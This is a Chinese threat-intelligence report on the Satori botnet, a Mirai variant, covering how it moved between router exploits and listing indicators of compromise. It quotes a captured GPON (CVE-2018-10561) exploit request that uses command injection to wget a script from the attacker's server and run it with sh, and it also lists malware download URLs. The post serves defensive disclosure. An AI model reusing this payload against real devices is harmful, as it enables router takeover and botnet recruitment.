僵尸永远不死，Satori也拒绝凋零

两天前，2018-06-14，我们注意到 Satori 的作者开始扫描收集 uc-httpd 1.0.0 设备的IP地址列表。这或许是为了针对4月公开的脆弱性 XiongMai uc-httpd 1.0.0 (CVE-2018-10088) 在做准备。这些扫描活动导致了近期在 80 和 8000 端口上的扫描流量大涨。

3小时前，就在我们撰写本篇文章的同时，Satori 作者又发布了一个更新版本。这个更新是个蠕虫，针对 D-Link DSL-2750B 设备，对应的漏洞利用在5月25日刚刚 公开 。

僵尸永远不死

Satori 是 Mirai 僵尸网络的一个变种，我们首次注意到该僵尸网络是 2017-11-22。一周之后，2017-12-05，Satori在12小时内感染了超过26万家用路由器设备，成为臭名昭著的僵尸网络。从那以后我们不再使用“一个mirai僵尸网络变种”称呼它，而是给予了它一个独立的名字 Satori。以上这些记录在我们的 报告 和 报告 中。

在那之后，安全社区采取了联合行动。多家运营商在 Satori 的重点攻击端口 37215 上采取了对抗措施。从事后看，这些措施有效抑制了 Satori 的扩张速度。但仅仅安全社区的这些披露和联合行动似乎并不能阻止 Satori 作者的更新。

2018-01-08，我们检测到 Satori 的后继变种Satori.Coin.Robber 尝试在端口37215和52869上重新建立整个僵尸网络。值得注意的是，新变种开始渗透互联网上现存Claymore Miner挖矿设备，通过攻击其3333 管理端口，替换钱包地址，并最终攫取受害挖矿设备的算力和对应的 ETH 代币。这是我们第一次见到僵尸网络替换其他挖矿设备的钱包。我们在另一份 报告 中批露了 Satori 的这些活动。

2018-05-10，GPON 漏洞（CVE-2018-10561，CVE-2018-10562）公布以后不到 10 天，Satori 也加入抢夺 GPON 易感设备的行列。并且Satori在短短时间内就挤掉了其它竞争对手，成为 “GPON僵尸Party” 中投放能力最强的一个。这已经是我们关于Satori 的第四份 报告 。

现在这篇是我们关于Satori 的第五份报告。僵尸永远不死，而且它们拒绝凋零。Satori的作者选择留在了场上。

Satori 过去几天里的活动更新

Satori 近期活动的核心样本如下：

hxxp://185.62.190.191/arm.bot.le   

该样本是由其它感染设备投入的，利用的漏洞是 GPON（ CVE-2018-10561），投入时的攻击Payload 是：

POST /GponForm/diag_Form?images/ HTTP/1.1   Host: 127.0.0.1:8080   Connection: keep-alive   Accept-Encoding: gzip, deflate   Accept: */*   User-Agent: Hello, World   Content-Length: 118XWebPageName=diagwget+hxxp://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/rwget hxxp://185.62.190.191/r -O -> /tmp/r;sh /tmp/r'$ HTTP/1.1   Host: 127.0.0.1   Connection: keep-alive   Accept-Encoding: gzip, deflate   Accept: */*   User-Agent: Hello, World   

IoC

185.62.190.191          Satori Downloader   180.101.204.161:48101   Satori Report   r.rippr.cc              Satori Reporter listed in this host's DNS TXT record   95.215.62.169:5600      Satori C2   i.rippr.cc              Satori C2 listed in this host's DNS TXT record   

Satori Malware Sample md5

f6568772b36064f3bb58ac3aec09d30e http://123.207.251.95:80/bins/arm   f6568772b36064f3bb58ac3aec09d30e http://123.207.251.95:80/bins/arm7   f6568772b36064f3bb58ac3aec09d30e http://185.62.190.191/arm.bot.le   99f13d801c40f23b19a07c6c77402095 http://123.207.251.95:80/bins/mpsl   99f13d801c40f23b19a07c6c77402095 http://185.62.190.191/mipsel.bot.le   e337d9c99bfe2feef8949f6563c57062 http://123.207.251.95:80/bins/arm7   e337d9c99bfe2feef8949f6563c57062 http://185.62.190.191/arm7.bot.le   f8d1d92e9b74445f2a0d7f1feb78d639 http://123.207.251.95:80/bins/arm   f8d1d92e9b74445f2a0d7f1feb78d639 http://185.62.190.191/arm.bot.le   656f4a61cf29f3af54affde4fccb5fd0 http://185.62.190.191/x86_64.bot.le   31a40e95b605a93f702e4aa0092380b9 http://185.62.190.191/i686.bot.le   426f8281d6599c9489057af1678ce468 http://185.62.190.191/arm7.bot.le   44133462bd9653da097220157b1c0c61 http://185.62.190.191/arm.bot.le   476cd802889049e3d492b8fb7c5d09ed http://185.62.190.191/mipsel.bot.le   bdf1a0ec31f130e959adafffb6014cce http://185.62.190.191/x86_64.bot.le   e193a58b317a7b44622efe57508eecc4 http://185.62.190.191/r  

转载请注明来自网盾网络安全培训，本文标题：《僵尸永远不死，Satori也拒绝凋零》

标签：僵尸网络